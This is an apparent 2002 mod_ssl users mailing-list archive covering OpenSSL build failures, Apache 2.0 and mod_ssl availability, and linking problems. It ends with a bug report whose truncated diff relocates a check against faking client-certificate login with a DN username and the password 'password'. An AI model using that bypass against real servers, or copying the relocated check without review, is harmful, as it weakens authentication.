[File exists] md4test.c => ../../test/md4test.c [File exists] md4.c => ../../apps/md4.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/md4' making links in crypto/md5... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/md5' Makefile => Makefile.ssl md5.h => ../../include/openssl/md5.h [File exists] md5test.c => ../../test/md5test.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/md5' making links in crypto/sha... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/sha' Makefile => Makefile.ssl sha.h => ../../include/openssl/sha.h [File exists] shatest.c => ../../test/shatest.c [File exists] sha1test.c => ../../test/sha1test.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/sha' making links in crypto/mdc2... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/mdc2' Makefile => Makefile.ssl mdc2.h => ../../include/openssl/mdc2.h [File exists] mdc2test.c => ../../test/mdc2test.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/mdc2' making links in crypto/hmac... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/hmac' Makefile => Makefile.ssl hmac.h => ../../include/openssl/hmac.h [File exists] hmactest.c => ../../test/hmactest.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/hmac' making links in crypto/ripemd... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/ripemd' Makefile => Makefile.ssl ripemd.h => ../../include/openssl/ripemd.h [File exists] rmdtest.c => ../../test/rmdtest.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/ripemd' making links in crypto/des... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/des' Makefile => Makefile.ssl asm/perlasm => ../../perlasm des.h => ../../include/openssl/des.h [File exists] destest.c => ../../test/destest.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/des' making links in crypto/rc2... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/rc2' Makefile => Makefile.ssl rc2.h => ../../include/openssl/rc2.h [File exists] rc2test.c => ../../test/rc2test.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/rc2' making links in crypto/rc4... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/rc4' Makefile => Makefile.ssl rc4.h => ../../include/openssl/rc4.h [File exists] rc4test.c => ../../test/rc4test.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/rc4' making links in crypto/rc5... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/rc5' Makefile => Makefile.ssl rc5.h => ../../include/openssl/rc5.h [File exists] rc5test.c => ../../test/rc5test.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/rc5' making links in crypto/idea... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/idea' Makefile => Makefile.ssl idea.h => ../../include/openssl/idea.h [File exists] ideatest.c => ../../test/ideatest.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/idea' making links in crypto/bf... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/bf' Makefile => Makefile.ssl blowfish.h => ../../include/openssl/blowfish.h [File exists] bftest.c => ../../test/bftest.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/bf' making links in crypto/cast... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/cast' Makefile => Makefile.ssl cast.h => ../../include/openssl/cast.h [File exists] casttest.c => ../../test/casttest.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/cast' making links in crypto/bn... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/bn' Makefile => Makefile.ssl bn.h => ../../include/openssl/bn.h [File exists] bntest.c => ../../test/bntest.c [File exists] exptest.c => ../../test/exptest.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/bn' making links in crypto/rsa... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/rsa' Makefile => Makefile.ssl rsa.h => ../../include/openssl/rsa.h [File exists] rsa_test.c => ../../test/rsa_test.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/rsa' making links in crypto/dsa... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/dsa' Makefile => Makefile.ssl dsa.h => ../../include/openssl/dsa.h [File exists] dsatest.c => ../../test/dsatest.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/dsa' making links in crypto/dh... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/dh' Makefile => Makefile.ssl dh.h => ../../include/openssl/dh.h [File exists] dhtest.c => ../../test/dhtest.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/dh' making links in crypto/dso... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/dso' Makefile => Makefile.ssl dso.h => ../../include/openssl/dso.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/dso' making links in crypto/buffer... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/buffer' Makefile => Makefile.ssl buffer.h => ../../include/openssl/buffer.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/buffer' making links in crypto/bio... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/bio' Makefile => Makefile.ssl bio.h => ../../include/openssl/bio.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/bio' making links in crypto/stack... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/stack' Makefile => Makefile.ssl stack.h => ../../include/openssl/stack.h [File exists] safestack.h => ../../include/openssl/safestack.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/stack' making links in crypto/lhash... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/lhash' Makefile => Makefile.ssl lhash.h => ../../include/openssl/lhash.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/lhash' making links in crypto/rand... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/rand' Makefile => Makefile.ssl rand.h => ../../include/openssl/rand.h [File exists] randtest.c => ../../test/randtest.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/rand' making links in crypto/err... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/err' Makefile => Makefile.ssl err.h => ../../include/openssl/err.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/err' making links in crypto/objects... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/objects' Makefile => Makefile.ssl objects.h => ../../include/openssl/objects.h [File exists] obj_mac.h => ../../include/openssl/obj_mac.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/objects' making links in crypto/evp... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/evp' Makefile => Makefile.ssl evp.h => ../../include/openssl/evp.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/evp' making links in crypto/asn1... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/asn1' Makefile => Makefile.ssl asn1.h => ../../include/openssl/asn1.h [File exists] asn1_mac.h => ../../include/openssl/asn1_mac.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/asn1' making links in crypto/pem... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/pem' Makefile => Makefile.ssl pem.h => ../../include/openssl/pem.h [File exists] pem2.h => ../../include/openssl/pem2.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/pem' making links in crypto/x509... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/x509' Makefile => Makefile.ssl x509.h => ../../include/openssl/x509.h [File exists] x509_vfy.h => ../../include/openssl/x509_vfy.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/x509' making links in crypto/x509v3... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/x509v3' Makefile => Makefile.ssl x509v3.h => ../../include/openssl/x509v3.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/x509v3' making links in crypto/conf... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/conf' Makefile => Makefile.ssl conf.h => ../../include/openssl/conf.h [File exists] conf_api.h => ../../include/openssl/conf_api.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/conf' making links in crypto/txt_db... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/txt_db' Makefile => Makefile.ssl txt_db.h => ../../include/openssl/txt_db.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/txt_db' making links in crypto/pkcs7... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/pkcs7' Makefile => Makefile.ssl pkcs7.h => ../../include/openssl/pkcs7.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/pkcs7' making links in crypto/pkcs12... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/pkcs12' Makefile => Makefile.ssl pkcs12.h => ../../include/openssl/pkcs12.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/pkcs12' making links in crypto/comp... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/comp' Makefile => Makefile.ssl comp.h => ../../include/openssl/comp.h [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/comp' make[1]: Leaving directory `/usr/local/openssl-0.9.6b/crypto' making links in ssl... make[1]: Entering directory `/usr/local/openssl-0.9.6b/ssl' Makefile => Makefile.ssl ssl.h => ../include/openssl/ssl.h [File exists] ssl2.h => ../include/openssl/ssl2.h [File exists] ssl3.h => ../include/openssl/ssl3.h [File exists] ssl23.h => ../include/openssl/ssl23.h [File exists] tls1.h => ../include/openssl/tls1.h [File exists] ssltest.c => ../test/ssltest.c [File exists] make[1]: Leaving directory `/usr/local/openssl-0.9.6b/ssl' making links in rsaref... make[1]: Entering directory `/usr/local/openssl-0.9.6b/rsaref' Makefile => Makefile.ssl rsaref.h => ../include/openssl/rsaref.h [File exists] make[1]: Leaving directory `/usr/local/openssl-0.9.6b/rsaref' making links in apps... make[1]: Entering directory `/usr/local/openssl-0.9.6b/apps' Makefile => Makefile.ssl make[1]: Leaving directory `/usr/local/openssl-0.9.6b/apps' making links in test... make[1]: Entering directory `/usr/local/openssl-0.9.6b/test' Makefile => Makefile.ssl make[1]: Leaving directory `/usr/local/openssl-0.9.6b/test' making links in tools... make[1]: Entering directory `/usr/local/openssl-0.9.6b/tools' Makefile => Makefile.ssl make[1]: Leaving directory `/usr/local/openssl-0.9.6b/tools' Configured for linux-elf. ______________________________________________________________---- and then while doing make it is getting aborted and giving following error, ../cryptlib.h:65: Internal error: Segmentation fault. Please submit a full bug report. See for instructions. make[2]: *** [a_octet.o] Error 1 make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/asn1' make[1]: *** [subdirs] Error 1 make[1]: Leaving directory `/usr/local/openssl-0.9.6b/crypto' make: *** [sub_all] Error 1 _________________________________________________________________ Please help me to resolve this problem ... Thanks and Regards .. Nisarg _____________________________________________________________ Want a new web-based email account ? ---> http://www.firstlinux.net _____________________________________________________________ Run a small business? Then you need professional email like you@yourbiz.com from Everyone.net http://www.everyone.net?tag ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 15:23:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA15973; Thu, 18 Apr 2002 15:21:20 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from executor.cambridge.redhat.com id PAA15925; Thu, 18 Apr 2002 15:20:46 +0200 (MET DST) Received: from host181.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90]) by executor.cambridge.redhat.com (Postfix) with ESMTP id CBA44ABB0E; Thu, 18 Apr 2002 14:20:39 +0100 (BST) Received: (from jorton@localhost) by host181.cambridge.redhat.com (8.11.6/8.11.0) id g3IDKdV23579; Thu, 18 Apr 2002 14:20:39 +0100 X-Authentication-Warning: radish.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f Date: Thu, 18 Apr 2002 14:20:39 +0100 From: Joe Orton To: Nisarg Rav Cc: modssl-users@modssl.org Subject: Re: Urgent help needed Regarding installation of openssl-0.9.6b on Redhat linux 7.1 Message-ID: <20020418142039.A23036@redhat.com> Mail-Followup-To: Nisarg Rav , modssl-users@modssl.org References: <20020418130608.4988136F9@sitemail.everyone.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020418130608.4988136F9@sitemail.everyone.net>; from nisarg@firstlinux.net on Thu, Apr 18, 2002 at 06:06:07AM -0700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joe Orton X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Apr 18, 2002 at 06:06:07AM -0700, Nisarg Rav wrote: > Hello gurus , > > I'm facing one typical problem while configuring openssl-0.9.6b on > RedHat linux 7.1 , kernel 2.4.2-2. Try upgrading your compiler: http://www.redhat.com/support/errata/RHBA-2001-082.html joe > ../cryptlib.h:65: Internal error: Segmentation fault. > Please submit a full bug report. > See for instructions. > make[2]: *** [a_octet.o] Error 1 > make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/asn1' > make[1]: *** [subdirs] Error 1 > make[1]: Leaving directory `/usr/local/openssl-0.9.6b/crypto' > make: *** [sub_all] Error 1 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 16:46:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA19819; Thu, 18 Apr 2002 16:45:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.fr.netcentrex.net id QAA19800; Thu, 18 Apr 2002 16:44:50 +0200 (MET DST) Received: from fr.netcentrex.net (AKIRA [213.56.166.228]) by www.fr.netcentrex.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id 29FDR4LL; Thu, 18 Apr 2002 16:44:41 +0200 Message-ID: <3CBEDBD4.1020408@fr.netcentrex.net> Date: Thu, 18 Apr 2002 16:44:36 +0200 From: Alban =?ISO-8859-1?Q?M=E9dici?= User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Apache 2.xxxx and mod-ssl ??? Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Alban =?ISO-8859-1?Q?M=E9dici?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, Is there anybody known if mod ssl anounce a version working with Apache 2.0.35 or later than 1.3.24 ?? I just wanna install Apache 2 with ssl mod + php + mysql + postgre + microCODE . Should I wait for a new version of modssl for apache 2 or use apache 1.3.24 ?? thanks -- Alban Médici R&D Software Engineer tel: +33 (0)2 31 46 35 80 (+005) -------------------------------- http://www.netcentrex.net amedici@fr.netcentrex.net ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 16:49:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA19947; Thu, 18 Apr 2002 16:48:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id QAA19937; Thu, 18 Apr 2002 16:47:43 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3IEjiq21351 for ; Thu, 18 Apr 2002 10:45:44 -0400 Date: Thu, 18 Apr 2002 10:45:44 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: Apache 2.xxxx and mod-ssl ??? In-Reply-To: <3CBEDBD4.1020408@fr.netcentrex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: 8BIT Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 18 Apr 2002, Alban [ISO-8859-1] Médici wrote: > Is there anybody known if mod ssl anounce a version working with Apache > 2.0.35 or later than 1.3.24 ?? Should I wait for a new version of modssl > for apache 2 or use apache 1.3.24 ?? Apache 2.0 comes bundled with mod_ssl. I suppose www.modssl.org should be updated to reflect that... --Cliff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 17:19:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA22299; Thu, 18 Apr 2002 17:18:16 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id RAA22271; Thu, 18 Apr 2002 17:17:43 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 18 Apr 2002 08:17:33 -0700 Received: from 134.32.101.94 by lw7fd.law7.hotmail.msn.com with HTTP; Thu, 18 Apr 2002 15:17:33 GMT X-Originating-IP: [134.32.101.94] From: "paul priestman" To: modssl-users@modssl.org Subject: Re: Problems with Apache 2.0.35 and SSL Date: Thu, 18 Apr 2002 15:17:33 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 18 Apr 2002 15:17:33.0318 (UTC) FILETIME=[29ED6A60:01C1E6EC] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "paul priestman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users 1. I have managed to install Apache 2.0.35 with mod SSL but it ony works >when i sepecify the servername as been the servers IP address instead of >the >actual name - is this a bug or is this the way Apache in tended? Do you mean in the actual ServerName directive? No that's not intended, but I've also never seen this problem. Can you email me a configuration snippet that demonstrates the problem? ---- Yes, its the ServerName directive. If i specify the host name e.g wellington.location.com:8443 then my server starts up okay and will run on http okay but when I try to goto port 8443 it says that connection is refused - i have tried also just putting wellington.location.com without the port number at the end but with the same effect. However, if i specify the actual IP address of the wellington then this works! - weired.... >Cannot load /opt/local/apache/apache_2.0.35/modules/mod_ssl.so into server: >ld.so.1: /opt/local/apache/apache_2.0.35/bin/httpd: fatal: relocation >error: >file /opt/local/apache/apache_2.0.35/modules/mod_ssl.so: symbol >X509_INFO_free: referenced symbol not found > >Is this a common bug? Yes, it's a fairly frequently asked question. The problem is that you've built a shared mod_ssl against a static OpenSSL (ie, libssl.a and libcrypto.a instead of .so). That won't work because the way the build system currently works, OpenSSL is linked into httpd, not mod_ssl. httpd doesn't need the symbols from the OpenSSL libraries, so the static linker throws them away, meaning they're no longer available when mod_ssl is dynamically linked at runtime. Solution: use a shared OpenSSL. ----- this works now!! thanks for your help --Cliff _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 17:55:50 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA25442; Thu, 18 Apr 2002 17:53:53 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA25189; Thu, 18 Apr 2002 17:50:13 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 1227D4CE771; Thu, 18 Apr 2002 17:50:10 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3IFfJ032549; Thu, 18 Apr 2002 17:41:19 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imo-r04.mx.aol.com id SAA12228; Wed, 17 Apr 2002 18:24:53 +0200 (MET DST) Received: from jasonsbuchanan@netscape.net by imo-r04.mx.aol.com (mail_out_v32.5.) id m.af.26394ec (16216) for ; Wed, 17 Apr 2002 12:24:19 -0400 (EDT) Received: from netscape.net (gw58-250.cmp.com [192.155.58.250]) by air-in01.mx.aol.com (v84.14) with ESMTP id MAILININ14-0417122418; Wed, 17 Apr 2002 12:24:18 -0500 Message-ID: <3CBDA1AD.2090401@netscape.net> Date: Wed, 17 Apr 2002 12:24:13 -0400 From: Jason Buchanan User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: modssl 2.8.5 for apache 1.3.22 is missing? Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Mailer: Unknown (No Version) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jason Buchanan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Is modssl 2.8.5 for apache 1.3.22 missing for a reason other than it's just missing? Is there a security risk or other reason for it being moved into the obsolete directory? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 17:56:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA25516; Thu, 18 Apr 2002 17:54:55 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA25197; Thu, 18 Apr 2002 17:50:15 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 841094CE798; Thu, 18 Apr 2002 17:50:11 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3IFi3r32670; Thu, 18 Apr 2002 17:44:03 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailout07.sul.t-online.com id PAA14780; Thu, 18 Apr 2002 15:01:25 +0200 (MET DST) Received: from fwd04.sul.t-online.de by mailout07.sul.t-online.com with smtp id 16yB9z-0002SI-09; Thu, 18 Apr 2002 14:37:11 +0200 Received: from web.de (0821523378-0001@[217.233.183.97]) by fwd04.sul.t-online.com with esmtp id 16yB9m-0OoWdUC; Thu, 18 Apr 2002 14:36:58 +0200 Message-ID: <3CBEBDE8.5080509@web.de> Date: Thu, 18 Apr 2002 14:36:56 +0200 From: Johann.Bertscheit@t-online.de (Johannes Artur Bertscheit) User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:0.9.4) Gecko/20011019 Netscape6/6.2 X-Accept-Language: de-DE MIME-Version: 1.0 To: modssl-users@modssl.org Subject: searching for Windows NT binary of Apache 2.0.35 with mod_ssl Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Sender: 0821523378-0001@t-dialin.net Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Johann.Bertscheit@t-online.de (Johannes Artur Bertscheit) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi all, has anyone out there successfully build a Apache 2.0.35 with mod_ssl openssl for windows NT? please give me a URL for such a binary. Currently there is only a non-ssl-version: apache_2.0.35-win32-x86-no_ssl.msi http://www.apache.org/dist/httpd/binaries/win32/#stable This version is only available at present in a -no_ssl flavor, due to ongoing questions of strong crypto restrictions. (??? sources are available - but the binary not ???) and I tried to compile the soruces with Visual C++ 6.0 without success (strange compilation errors occured). Before I try further to compile the stuff by my own - maybe someone was already successful? Thanks in advance! Johannes ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 17:56:38 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA25579; Thu, 18 Apr 2002 17:55:26 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA25176; Thu, 18 Apr 2002 17:50:10 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 7FA134CE762; Thu, 18 Apr 2002 17:50:09 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3IFeAW32508; Thu, 18 Apr 2002 17:40:10 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailout09.sul.t-online.com id PAA01764; Wed, 17 Apr 2002 15:19:40 +0200 (MET DST) Received: from fwd11.sul.t-online.de by mailout09.sul.t-online.com with smtp id 16xpLR-0002ua-0R; Wed, 17 Apr 2002 15:19:33 +0200 Received: from web.de (0821523378-0001@[217.233.162.167]) by fwd11.sul.t-online.com with esmtp id 16xpLM-0TqM64C; Wed, 17 Apr 2002 15:19:28 +0200 Message-ID: <3CBD765F.9060409@web.de> Date: Wed, 17 Apr 2002 15:19:27 +0200 From: Johann.Bertscheit@t-online.de (Johannes Artur Bertscheit) User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:0.9.4) Gecko/20011019 Netscape6/6.2 X-Accept-Language: de-DE MIME-Version: 1.0 To: modssl-users@modssl.org Cc: "pete.werner@web.de" , "peter.werner@icn.siemens.de" Subject: searching for Windows NT binary of Apache 2.0.35 with mod_ssl Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Sender: 0821523378-0001@t-dialin.net Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Johann.Bertscheit@t-online.de (Johannes Artur Bertscheit) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi all, has anyone out there successfully build a Apache 2.0.35 with mod_ssl openssl for windows NT? please give me a URL for such a binary. Currently there is only a non-ssl-version: apache_2.0.35-win32-x86-no_ssl.msi http://www.apache.org/dist/httpd/binaries/win32/#stable This version is only available at present in a -no_ssl flavor, due to ongoing questions of strong crypto restrictions. (??? sources are available - but the binary not ???) and I tried to compile the soruces with Visual C++ 6.0 without success (strange compilation errors occured). Before I try further to compile the stuff by my own - maybe someone was already successful? Thanks in advance! Johannes ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 17:56:46 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA25592; Thu, 18 Apr 2002 17:55:35 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA25177; Thu, 18 Apr 2002 17:50:10 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 8FCA24CE764; Thu, 18 Apr 2002 17:50:09 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3IFdc432469; Thu, 18 Apr 2002 17:39:38 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id MAA23161; Wed, 17 Apr 2002 12:54:22 +0200 (MET DST) Date: Wed, 17 Apr 2002 12:54:22 +0200 (MET DST) Message-Id: <200204171054.MAA23161@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] Client Authentication BUG with FakeBasicAuth (PR#695) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Sergio Rabellino Version: 2.8.8 OS: Solaris 7 Submission from: (NULL) (130.192.239.73) The "if" in ssl_engine_kernel.c at line 1130 to check against DN/password authorization directly form a client, break also the internal redirect done by apache under some conditions, as the directory indexing ... So if you use client auth, with fake basic auth and require an index, you get a 301 followed by a 403 (Forbidden)... Below i've attached a diff patch to correct this behaviour; i've tested it on my hosts and all things should be fine now. Thanks to Nick Miles for pinpointing me to the solution. Bye. ---snip 1130,1147d1129 < * Make sure the user is not able to fake the client certificate < * based authentication by just entering an X.509 Subject DN < * ("/XX=YYY/XX=YYY/..") as the username and "password" as the < * password. < */ < if ((cpAL = ap_table_get(r->headers_in, "Authorization")) != NULL) { < if (strcEQ(ap_getword(r->pool, &cpAL, ' '), "Basic")) { < while (*cpAL == ' ' || *cpAL == '\t') < cpAL++; < cpAL = ap_pbase64decode(r->pool, cpAL); < cpUN = ap_getword_nulls(r->pool, &cpAL, ':'); < cpPW = cpAL; < if (cpUN[0] == '/' && strEQ(cpPW, "password")) < return FORBIDDEN; < } < } < < /* 1158a1141,1161 > { > /* > * Make sure the user is not able to fake the client certificate > * based authentication by just entering an X.509 Subject DN > * ("/XX=YYY/XX=YYY/..") as the username and 